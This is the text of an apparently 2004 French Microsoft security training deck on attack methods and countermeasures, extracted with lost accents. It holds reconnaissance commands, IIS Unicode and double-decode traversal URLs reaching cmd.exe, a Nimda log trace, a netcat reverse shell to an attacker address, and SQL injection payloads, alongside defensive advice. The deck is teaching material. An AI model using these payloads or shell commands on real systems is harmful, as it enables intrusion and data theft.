Vous êtes sur la page 1sur 6

8/23/2011 8:57 PM

Avertissement Mthodes dattaque et contrecontre-mesures


Cyril Voisin Chef de programme scurit Pascal Sauliere Consultant principal scurit Microsoft France Le but de cette prsentation est pdagogique:
Illustrer certaines faiblesses, certaines erreurs courantes en sappuyant sur des attaques connues Et surtout en dduire les moyens de mieux vous protger, pour viter ces types dattaques

Important : les attaques faisant intervenir des vulnrabilits ont t choisies pour illustrer les propos, et font volontairement appel des vulnrabilits connues depuis plusieurs mois ou annes et dont les corrections sont disponibles et largement diffuses

Rappel : la loi sanctionne


Loi du 5 janvier 1986 relative a la fraude informatique, dite Loi Godefrain Articles 323-1 et suivants du Code pnal 323323323-1 : Le fait d'accder ou de se maintenir, frauduleusement, dans tout ou partie d'un systme de traitement automatis de donnes est puni d'un an d'emprisonnement et de 15000 euros d'amende. Lorsqu'il en est rsult soit la suppression ou la modification de donnes contenues dans le systme, soit une altration du fonctionnement de ce systme, la peine est de deux ans d'emprisonnement et de 30000 euros d'amende. 323323-2 : Le fait d'entraver ou de fausser le fonctionnement d'un systme de traitement automatis de donnes est puni de trois ans d'emprisonnement et de 45000 euros d'amende. 323323-3 : Le fait d'introduire frauduleusement des donnes dans un systme de traitement automatis ou de supprimer ou de modifier frauduleusement les donnes qu'il contient est puni de trois ans d'emprisonnement et de 45000 euros d'amende.

Dmarche thorique
Renseignement Scanning numration Pntration lvation de privilge Accs interactif Nettoyage

dans la pratique :
numrer tout ce que lon peut (adresses, ports, services, OS, versions, utilisateurs) Tester toutes les vulnrabilits connues Contourner les protections, trouver la petite porte Casser les mots de passe Installer son rootkit Cacher ses traces

Scnario
JeanJean-Kevin fait un stage au service courrier chez PLA S.A. (Pieds de Lunettes Astronomiques) Il est mal pay Il a du temps Il apporte son PC portable et le branche sur le rseau.

2003 CSI/FBI Computer Crime and Security Survey :


Les formes dattaques cites le plus souvent sont les virus (82%) et les abus par des utilisateurs internes (80%)

2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8/23/2011 8:57 PM

Rseau dcouvrir

Ping Sweep
Objectif : numrer les machines qui rpondent au Ping (ICMP Echo Request) Outils :
Ping (Windows) Nmap -sP (Fyodor, insecure.org) sl -n (ScanLine, ex-fscan de Foundstone) ex

Adresses et noms
MARS VENUS HALLEY

Port Scanning
Objectif : numrer les services prsents sur une machine (Ports TCP et UDP ouverts ) Outils :
Nmap (insecure.org) sl (Foundstone) SuperScan (Foundstone)

192.168.11.2

192.168.11.3

192.168.11.4

192.168.11.10

Services
MARS DC VENUS SMTP HTTP HTTPS HALLEY DC SQL

Dtermination des versions


Versions des OS Versions des services C:\>nc www.msn.com 80 Exemple : HEAD / HTTP/1.0
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 08 Apr 2004 20:55:19 GMT Content-Type: text/html Content-Length: 172

192.168.11.2

192.168.11.3

192.168.11.4

192.168.11.10

Outils :
nc (NetCat : @Stake) Nmap -sV -O

2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8/23/2011 8:57 PM

Version des OS
MARS DC VENUS IIS HALLEY DC SQL W2000 192.168.11.4

numration NetBIOS
Objectifs : machines, domaines, contrleurs de domaine Outils : Name Service Type
Nbtstat Nbtscan
---------------------------------------CORP-DC <00> UNIQUE CORP-DC <20> UNIQUE CORP <00> GROUP CORP <1c> GROUP CORP <1b> UNIQUE CORP-DC <03> UNIQUE CORP <1e> GROUP INet~Services <1c> GROUP IS~CORP-DC <00> UNIQUE CORP <1d> UNIQUE ??__MSBROWSE__? <01> GROUP ADMIN <03> UNIQUE

W2000 192.168.11.2

W2000 192.168.11.3

Contr l r omaine

192.168.11.10

Utilisateur

2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8/23/2011 8:57 PM

Approbation

DomA

Accs aux ressources

DomB

2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8/23/2011 8:57 PM

File System traversal


Par dfaut (NT4, W2K) :
/scripts est excutable Correspond C:\Inetpub\Scripts C:\Inetpub\ Windows dans C:\WINNT C:\ Commandes systmes dans : scripts/../../winnt/system32 La squence ../ est interdite

File System Traversal


UNICODE
RFC 2279 (codage UTF-8) dcodage aprs le UTFcontrle de ../ %c0%af / %c1%9c \ Corrig dans MS00-057 et W2K SP2 MS00-

Double decode : dcodage UTF-8, contrle, puis UTF2me dcodage..


%252f %252f %2f / %25%32%66 %25%32%66 %2f / %255c %255c %5c \ Corrig dans MS01-026 et W2K SP3 MS01-

Des bugs (W2K pr-SP2 et prprprSP3) permettaient de contourner le contrle de ../

File System Traversal


Pr SP2 :
http://server/scripts/..%c0%af../winnt/system32/ http://server/scripts/..%c0%af../winnt/system32/ cmd.exe?/c+dir

Trace de Nimda, sept. 2001


/scripts/..%255c../winnt/system32/cmd.exe /scripts/..%5c../winnt/system32/cmd.exe /scripts/root.exe /msadc/root.exe /c/winnt/system32/cmd.exe /d/winnt/system32/cmd.exe /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd .exe /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd .exe /scripts/winnt/system32/cmd.exe /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../. .%c1%1c../winnt/system32/cmd.exe /scripts/..%c1%1c../winnt/system32/cmd.exe /scripts/..%c0%af../winnt/system32/cmd.exe /scripts/..%252f../winnt/system32/cmd.exe /scripts/..%c1%9c../winnt/system32/cmd.exe

Pr SP3 :
http://server/scripts/..%255c..%255cwinnt/ http://server/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir

Exemples de commandes :
cmd.exe /c dir cmd.exe /c echo xxx >> fichier.asp

Mise en
Serveur IIS

uvre
(3) Ecoute : nc l p 2222

Contre mesures

Attaquant

Rpertoires web sur un volume spar IIS Lockdown (dsactivation composants inutiles, ACLs) + URLScan Application des correctifs de scurit (liste avec MBSA) Configurer le pare-feu et les stratgies pareIPsec pour ne laisser passer que les flux autoriss (source, destination, protocole, port) :
IIS SQL TCP 1433 TCP 80, 443

(4) Connexion : nc e cmd.exe xx.xx.xx.xx 2222

2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8/23/2011 8:57 PM

Attaque de SQL Server


Trouver une vulnrabilit
De SQL Server (ex : Slammer) Des applications utilisant SQL Server (cross site scripting, injection SQL)

Injection SQL
Non spcifique IIS, ni SQL Server Principe :
Requte SQL construite avec une entre de lutilisateur Exemple :
sqlCommand.CommandText = "Select title_id, "Select title, price From titles Where title like '%" + '%" TextBox1.Text + "%'"; "%'"; Select title_id, title, price From titles Where title like '%XXX%' '%XXX%' Select title_id, title, price From titles Where title like '%X' Or 1=1--%' '%X' 1=1--%' Select title_id, title, price From titles Where title like '%X' Union select 'A',name,0 from '%X' master..sysdatabases--%' master..sysdatabases--%'

Trouver un mot de passe (SQLdict.exe)

Contre mesures
Scurit intgre Windows Mots de passe complexes Qualit du code (procdures stockes, requtes paramtres, validation des entres)

Conclusions
Erreur de manipulation de ladministrateur
Compte de test non dsactiv

Absence de patch
IIS double decode, rvlation de code (Blaster, Sasser)

Erreur de dveloppement
Buffer overflow Injection SQL / utilisation de trop de privilges CrossCross-site scripting

Config par dfaut pas assez scurise


LMHash RestrictAnonymous

Ressources disponibles
Security Guidance Center http://www.microsoft.com/security/guidance/ Site Microsoft sur la scurit (tout public)
http://www.microsoft.com/france/securite/

Site MSDN sur la scurit (dveloppeurs)


http://msdn.microsoft.com/security (en anglais)

Site Technet sur la scurit (informaticiens)


http://www.microsoft.com/france/technet/themes/secur /default.asp

S'inscrire aux bulletins de scurit :


http://www.microsoft.com/security/security_bulletins/al erts2.asp (en anglais)

2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.